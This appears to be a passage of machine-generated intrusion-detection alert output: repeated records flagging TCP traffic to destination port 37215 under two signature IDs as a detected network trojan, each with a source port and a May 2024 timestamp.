              SID:2829579
              Source Port:46080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536061
              SID:2829579
              Source Port:36862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433413
              SID:2829579
              Source Port:37722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482197
              SID:2829579
              Source Port:38224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575245
              SID:2829579
              Source Port:49380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.491522
              SID:2835222
              Source Port:33798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.494270
              SID:2835222
              Source Port:33480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395112
              SID:2835222
              Source Port:53554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100475
              SID:2835222
              Source Port:53770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459905
              SID:2829579
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118918
              SID:2835222
              Source Port:41310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553140
              SID:2829579
              Source Port:33856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.454398
              SID:2829579
              Source Port:55206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519089
              SID:2835222
              Source Port:55156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.992101
              SID:2835222
              Source Port:36946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631713
              SID:2835222
              Source Port:41010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637823
              SID:2835222
              Source Port:55634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506067
              SID:2829579
              Source Port:50582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489319
              SID:2829579
              Source Port:33710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725349
              SID:2829579
              Source Port:45380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988403
              SID:2835222
              Source Port:39202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448310
              SID:2829579
              Source Port:36510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622934
              SID:2829579
              Source Port:33002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474727
              SID:2829579
              Source Port:57984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522568
              SID:2835222
              Source Port:35390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154156
              SID:2835222
              Source Port:52256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601297
              SID:2835222
              Source Port:33420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506302
              SID:2829579
              Source Port:48484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.552369
              SID:2829579
              Source Port:57934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284664
              SID:2835222
              Source Port:51776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.114709
              SID:2835222
              Source Port:52454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078525
              SID:2829579
              Source Port:37690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187560
              SID:2835222
              Source Port:56986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.750648
              SID:2835222
              Source Port:43376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329681
              SID:2835222
              Source Port:33668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397224
              SID:2835222
              Source Port:59888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501868
              SID:2829579
              Source Port:33532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545907
              SID:2829579
              Source Port:43668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196893
              SID:2829579
              Source Port:38968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073478
              SID:2835222
              Source Port:48818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233593
              SID:2829579
              Source Port:57376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397910
              SID:2835222
              Source Port:51040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802515
              SID:2835222
              Source Port:43158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166395
              SID:2829579
              Source Port:44478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581978
              SID:2829579
              Source Port:44464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408078
              SID:2829579
              Source Port:46278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308681
              SID:2835222
              Source Port:52222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048715
              SID:2829579
              Source Port:38044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625293
              SID:2829579
              Source Port:52190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.453583
              SID:2835222
              Source Port:45910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193891
              SID:2835222
              Source Port:47360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578864
              SID:2829579
              Source Port:36224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975453
              SID:2835222
              Source Port:45650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801716
              SID:2835222
              Source Port:52606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187109
              SID:2829579
              Source Port:44424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.194496
              SID:2835222
              Source Port:52526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128176
              SID:2829579
              Source Port:55814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284757
              SID:2835222
              Source Port:52064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536204
              SID:2835222
              Source Port:38460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186136
              SID:2829579
              Source Port:54692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.477355
              SID:2835222
              Source Port:36306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543813
              SID:2835222
              Source Port:34672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629539
              SID:2829579
              Source Port:50744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980964
              SID:2829579
              Source Port:58542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445005
              SID:2835222
              Source Port:41098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270381
              SID:2829579
              Source Port:53416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443685
              SID:2829579
              Source Port:58186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364328
              SID:2835222
              Source Port:48394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535519
              SID:2835222
              Source Port:40180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519524
              SID:2829579
              Source Port:52326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459848
              SID:2829579
              Source Port:35826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486010
              SID:2835222
              Source Port:39262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967860
              SID:2835222
              Source Port:33188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534879
              SID:2829579
              Source Port:55016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332378
              SID:2835222
              Source Port:44070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861919
              SID:2829579
              Source Port:58736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.444000
              SID:2829579
              Source Port:58660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982041
              SID:2829579
              Source Port:49918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.430634
              SID:2829579
              Source Port:51562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.155040
              SID:2835222
              Source Port:48730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169268
              SID:2835222
              Source Port:53236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.398412
              SID:2829579
              Source Port:58104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506020
              SID:2835222
              Source Port:49088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341141
              SID:2829579
              Source Port:43944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.204784
              SID:2829579
              Source Port:51238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982052
              SID:2835222
              Source Port:59008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448830
              SID:2835222
              Source Port:39398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.774605
              SID:2835222
              Source Port:33064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525798
              SID:2835222
              Source Port:47038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.166809
              SID:2829579
              Source Port:38188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249578
              SID:2835222
              Source Port:47450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671655
              SID:2829579
              Source Port:56800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360642
              SID:2829579
              Source Port:35844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.631841
              SID:2835222
              Source Port:52512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.195120
              SID:2835222
              Source Port:56400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111337
              SID:2829579
              Source Port:36842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.974258
              SID:2829579
              Source Port:49340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186165
              SID:2829579
              Source Port:40668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.129715
              SID:2829579
              Source Port:45238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.692506
              SID:2835222
              Source Port:39040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858343
              SID:2835222
              Source Port:47108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636711
              SID:2835222
              Source Port:47552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530952
              SID:2835222
              Source Port:60604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537762
              SID:2835222
              Source Port:60528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.280388
              SID:2835222
              Source Port:56206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.110787
              SID:2829579
              Source Port:38440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278267
              SID:2829579
              Source Port:40052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048917
              SID:2829579
              Source Port:35442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600569
              SID:2829579
              Source Port:36660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103194
              SID:2835222
              Source Port:41230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.378132
              SID:2829579
              Source Port:40540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704725
              SID:2829579
              Source Port:45986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492344
              SID:2835222
              Source Port:56856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202899
              SID:2835222
              Source Port:35492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519653
              SID:2829579
              Source Port:55774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536527
              SID:2835222
              Source Port:37082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187438
              SID:2835222
              Source Port:34272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168042
              SID:2829579
              Source Port:34598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065746
              SID:2829579
              Source Port:55976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538149
              SID:2829579
              Source Port:39500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.601444
              SID:2829579
              Source Port:54096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432339
              SID:2829579
              Source Port:40086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.285062
              SID:2829579
              Source Port:48984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.536469
              SID:2829579
              Source Port:55190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045224
              SID:2829579
              Source Port:53144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.546359
              SID:2835222
              Source Port:37834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372028
              SID:2835222
              Source Port:48752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233930
              SID:2829579
              Source Port:46214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100795
              SID:2829579
              Source Port:42350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967256
              SID:2829579
              Source Port:44950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.059992
              SID:2829579
              Source Port:40532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.421671
              SID:2835222
              Source Port:56616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341168
              SID:2835222
              Source Port:34424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.591564
              SID:2835222
              Source Port:43566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098907
              SID:2835222
              Source Port:41820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621837
              SID:2835222
              Source Port:60310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116011
              SID:2829579
              Source Port:59928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623352
              SID:2835222
              Source Port:50176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574681
              SID:2835222
              Source Port:48288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.159699
              SID:2829579
              Source Port:38356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230986
              SID:2835222
              Source Port:34682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450402
              SID:2829579
              Source Port:48404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.445517
              SID:2835222
              Source Port:35902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535620
              SID:2829579
              Source Port:44840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455313
              SID:2835222
              Source Port:35440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.516488
              SID:2835222
              Source Port:50694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585474
              SID:2835222
              Source Port:59086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.232800
              SID:2835222
              Source Port:60624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113501
              SID:2829579
              Source Port:52428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802129
              SID:2829579
              Source Port:44860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.105023
              SID:2829579
              Source Port:56532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.606362
              SID:2835222
              Source Port:39090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502996
              SID:2829579
              Source Port:43646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334285
              SID:2835222
              Source Port:58350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487002
              SID:2835222
              Source Port:32814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394480
              SID:2829579
              Source Port:59992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581661
              SID:2835222
              Source Port:41172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459710
              SID:2835222
              Source Port:34494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411264
              SID:2829579
              Source Port:54766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446429
              SID:2835222
              Source Port:44246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188375
              SID:2835222
              Source Port:33186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105596
              SID:2829579
              Source Port:53520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697432
              SID:2829579
              Source Port:50974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332146
              SID:2835222
              Source Port:42834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063230
              SID:2835222
              Source Port:45180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481413
              SID:2835222
              Source Port:38090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694776
              SID:2829579
              Source Port:55476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802256
              SID:2835222
              Source Port:49170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.107898
              SID:2829579
              Source Port:55708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.676400
              SID:2829579
              Source Port:60106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100658
              SID:2835222
              Source Port:33940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313750
              SID:2835222
              Source Port:46576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187404
              SID:2829579
              Source Port:39890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882516
              SID:2835222
              Source Port:56824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063188
              SID:2829579
              Source Port:38388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965602
              SID:2829579
              Source Port:49662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.201005
              SID:2835222
              Source Port:47236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572017
              SID:2829579
              Source Port:44492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.401461
              SID:2829579
              Source Port:52994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.982229
              SID:2829579
              Source Port:42144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253659
              SID:2835222
              Source Port:41540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662594
              SID:2829579
              Source Port:56962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430553
              SID:2835222
              Source Port:48936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538167
              SID:2829579
              Source Port:45938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663677
              SID:2835222
              Source Port:54344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396332
              SID:2829579
              Source Port:46920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459786
              SID:2835222
              Source Port:59468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121488
              SID:2835222
              Source Port:52222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100594
              SID:2829579
              Source Port:51394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456751
              SID:2835222
              Source Port:34570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516504
              SID:2829579
              Source Port:45450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313525
              SID:2829579
              Source Port:39450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100698
              SID:2835222
              Source Port:58422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.589037
              SID:2829579
              Source Port:41482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545481
              SID:2835222
              Source Port:43736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.168709
              SID:2835222
              Source Port:36380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.918044
              SID:2835222
              Source Port:44712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501758
              SID:2835222
              Source Port:44316
              Destination Port:37215
